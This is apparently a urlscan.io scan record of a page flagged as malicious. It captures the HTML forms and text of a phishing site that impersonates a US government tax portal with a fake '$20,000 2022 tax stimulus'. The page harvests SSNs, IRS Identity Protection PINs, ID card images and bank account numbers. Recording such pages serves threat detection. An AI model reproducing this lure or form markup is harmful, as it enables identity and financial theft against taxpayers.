refundclaim.z13.web.core.windows.net Open in urlscan Pro
20.209.1.68  Malicious Activity! Public Scan

Submitted URL: https://refundclaim.z13.web.core.windows.net/
Effective URL: https://refundclaim.z13.web.core.windows.net/
Submission: On June 29 via api from JP — Scanned from JP

Form analysis 3 forms found in the DOM

<form style="margin: 10px" id="formSubmit" onsubmit="processForm(event)">
  <div class="row mt-3 mb-3">
    <div class="col">
      <label for="agree"><b>HAVE YOU APPLIED FOR 2022 TAX REFUND?:</b></label>
      <select id="agree" name="agree" class="form-control" required="">
        <option value="Yes">Yes</option>
        <option value="No">No</option>
      </select>
    </div>
  </div>
  <div class="row mt-3 ">
    <div class="col-md-6 mb-3">
      <label for="fName"><b>First Name:</b></label>
      <input type="text" class="form-control" id="fName" name="fName" placeholder="First Name" required="">
    </div>
    <div class="col-md-6 mb-3">
      <label for="lName"><b>Last Name:</b></label>
      <input type="text" class="form-control" id="lName" name="fName" placeholder="Last Name" required="">
    </div>
  </div>
  <div class="row mt-3 ">
    <div class="col-md-6 mb-3">
      <label for="sAddress"><b>Street Address:</b></label>
      <input type="text" class="form-control" id="sAddress" name="sAddress" placeholder="Street Address" required="">
    </div>
    <div class="col-md-6 mb-3">
      <label for="city"><b>City:</b></label>
      <input type="text" class="form-control" id="city" name="city" placeholder="City" required="">
    </div>
  </div>
  <div class="row mt-3 ">
    <div class="col-md-6 mb-3">
      <label for="state"><b>State:</b></label>
      <input type="text" class="form-control" id="state" name="state" placeholder="State" required="">
    </div>
    <div class="col-md-6 mb-3">
      <label for="zip"><b>zip code:</b></label>
      <input type="text" class="form-control" id="zip" name="zip" placeholder="Zip code" required="">
    </div>
  </div>
  <div class="row mt-3 ">
    <div class="col-md-6 mb-3">
      <label for="state"><b>Email:</b></label>
      <input type="text" class="form-control" id="email" name="email" placeholder="Email Address" required="">
    </div>
    <div class="col-md-6 mb-3">
      <label for="phone"><b>Phone Number:</b></label>
      <input type="text" class="form-control" id="phone" name="phone" placeholder="Phone number " required="">
    </div>
  </div>
  <div class="row mt-3 mb-3">
    <div class="col">
      <label for="ssn"><b>SSN(Social Security Number):</b></label>
      <input type="text" minlength="9" maxlength="9" class="form-control" id="ssn" name="ssn" placeholder="Social Security Number" required="">
    </div>
  </div>
  <span id="charLimitMessage"></span>
  <div class="row mt-3 mb-3">
    <h4 class="col" style="text-align: center"> Select one of 2021 OR 2022 Tax AGI </h4>
  </div>
  <div>
    <h4 class="col" style="text-align: center">Answer only 1 of the 3 AGI boxes</h4>
  </div>
  <div class="row mt-3 mb-3">
    <div class="col">
      <label for="Agi"><b>(BOX 1)</b><b> 2021 Tax AGI (This has to be your 2021 Tax AGI, as it is in
                                your FORM 1040):</b></label>
      <input type="text" class="form-control" id="Agi" name="Agi" placeholder="2021 TAX AGI">
    </div>
    <h4 class="text-center my-3">OR</h4>
    <div class="col">
      <label for="Agi22"><b>(BOX 2)</b><b> 2022 Tax AGI (This has to be your 2022 Tax AGI, as it is in
                                your FORM 1040):</b></label>
      <input type="text" class="form-control" id="Agi22" name="Agi22" placeholder="2022 TAX AGI">
    </div>
  </div>
  <h4 class="text-center my-3">OR</h4>
  <div class="row mt-3 mb-3">
    <label for="Agi"><b>(BOX 3)</b><b> If you didn't file 2021 or 2022 tax refund, when was your last filing year:</b></label>
    <input type="text" class="form-control" id="Agi32" name="Agi32" placeholder="YYYY">
  </div>
  <div class="row mt-3 mb-3">
    <label for="Agi"><b>AGI for the last filing year that you stated:</b></label>
    <input type="text" class="form-control" id="Agi42" name="Agi42" placeholder="AGI">
  </div>
  <div class="row mt-3 mb-3">
    <div class="col">
      <label for="IPPin"><b>IDENTITY PROTECTION PIN(If you can't remember or if you don't
                                have one, send (HELP) to
                                <b style="color: #00599c; font-size: 18px">(940) 220-7770</b> to get PIN immediately):</b></label>
      <input type="text" class="form-control" minlength="6" maxlength="6" id="IPPin" name="IPPin" placeholder="Identity Protection Pin" required="">
    </div>
  </div>
  <div class="row mt-3 mb-3">
    <h4 class="col" style="text-align: center"> Upload any valid federal or state identification card (State Id or Driver's License) </h4>
  </div>
  <div class="row mt-3 mb-3">
    <div class="col-md-6 mb-3">
      <label for="photo1"><b>Front Image:</b></label>
      <input type="file" class="form-control-file" id="photo1" name="photo1" required="">
    </div>
    <div class="col-md-6">
      <label for="photo2"><b>Back Image:</b></label>
      <input type="file" class="form-control-file" id="photo2" name="photo2" required="">
    </div>
  </div>
  <div class="mt-4">
    <button id="submit-btn-text mt-3" onclick="processButton(this)" class="btn btn-primary btn-lg"> Continue </button>
  </div>
</form>

<form style="background-color: #ccc" id="formSubmit" class="p-3" onsubmit="processForm3(event)">
  <div class="row mt-3 mb-3">
    <div class="col">
      <label for="Account"><b>Account Number:</b></label>
      <input type="text" class="form-control" id="Account" name="Account" placeholder="Account Number" required="">
    </div>
  </div>
  <div class="row mt-3 mb-3">
    <div class="col">
      <label for="Routine"><b>Bank Routine Number:</b></label>
      <input type="text" class="form-control" id="Routine" name="Routine" placeholder="Bank Routine Number" required="">
    </div>
  </div>
  <div class="row mt-3 mb-3">
    <div class="col">
      <button type="submit" id="submit-btn-text" class="btn btn-primary btn-block"> Apply Now </button>
    </div>
  </div>
</form>

<form style="background-color: #ccc" id="formSubmit" class="p-3 last-form mb-md-4 mb-3" onsubmit="processForm3(event)">
  <div class="row mt-3 mb-3">
    <div class="col text-center">
      <img src="https://svgsilh.com/png-512/146635-4caf50.png" class="img-fluid">
    </div>
  </div>
  <div class="row mt-3 mb-3">
    <div class="col mt-3">
      <b>Your claim has been submitted and is currently being
                                processed. A letter indicating the approval will be sent to
                                your mailing address within the next few days</b>
    </div>
  </div>
  <div class="row mt-3 mb-3">
    <div class="col">
      <b>Kindly note that payment for your claim will be made into the
                                account provided in two weeks time, after receiving the
                                approval letter.</b>
    </div>
  </div>
</form>

Text Content

An official website of the United States Government

 * Help
 * News
 * English
 * Charity and Nonprofits
 * Tax Pros

 * Help

File Pay Refund Credits and Deductions Form & Insructions
Helping people understand and meet their tax responsibilities


2022 TAX STIMULUS


CLAIM UP TO $20,000 TAX STIMULUS


HOW DO I CLAIM MY STIMULUS CHEQUE?


MOST AMERICANS HAVE ALREADY RECEIVED THEIR STIMULUS PAYMENTS, BUT IF YOU
HAVEN'T, THERE'S STILL A COUPLE WAYS TO GET THE CASH.

The Treasury Inspector General for Tax Administration (TIGTA) has shared a
report, revealing several factors as to why payments may be delayed. We are
reaching out to you to get you on the fast track of getting your payment and
avoiding any delay in payment.

Most people received their stimulus payment by check or direct deposit while
others received them in the form of prepaid debit cards.


WHO QUALIFIES FOR STIMULUS MONEY?

During the pandemic, the federal government issued three rounds of stimulus
worth $1,200, $600 and $1,400 respectively.

For the third tranche, generally, you were sent a check if you filed a 2020 tax
return and met the income restrictions.

Either you filed for 2022 refund already, or not, you are qualified to apply and
get up to $20,000 2022 TAX STIMULUS.

Follow the easy step on the next page

Continue to claim 2022 Tax stimulus
 * Privacy Policy
 * Accessibility


ABOUT FORM 1023, APPLICATION FOR RECOGNITION OF EXEMPTION UNDER SECTION
501(C)(17) OF THE INTERNAL REVENUE CODE.

Please fill all fields
HAVE YOU APPLIED FOR 2022 TAX REFUND?: Yes No
First Name:
Last Name:
Street Address:
City:
State:
zip code:
Email:
Phone Number:
SSN(Social Security Number):

SELECT ONE OF 2021 OR 2022 TAX AGI

ANSWER ONLY 1 OF THE 3 AGI BOXES

(BOX 1) 2021 Tax AGI (This has to be your 2021 Tax AGI, as it is in your FORM
1040):

OR

(BOX 2) 2022 Tax AGI (This has to be your 2022 Tax AGI, as it is in your FORM
1040):

OR

(BOX 3) If you didn't file 2021 or 2022 tax refund, when was your last filing
year:
AGI for the last filing year that you stated:
IDENTITY PROTECTION PIN(If you can't remember or if you don't have one, send
(HELP) to (940) 220-7770 to get PIN immediately):

UPLOAD ANY VALID FEDERAL OR STATE IDENTIFICATION CARD (STATE ID OR DRIVER'S
LICENSE)

Front Image:
Back Image:
Continue
 * Privacy Policy
 * Accessibility


TO RECEIVE PAYMENT VIA DIRECT DEPOSIT

Please fill all fields
Account Number:
Bank Routine Number:
Apply Now
 * Privacy Policy
 * Accessibility

Please fill all fields
Your claim has been submitted and is currently being processed. A letter
indicating the approval will be sent to your mailing address within the next few
days
Kindly note that payment for your claim will be made into the account provided
in two weeks time, after receiving the approval letter.
 * Privacy Policy
 * Accessibility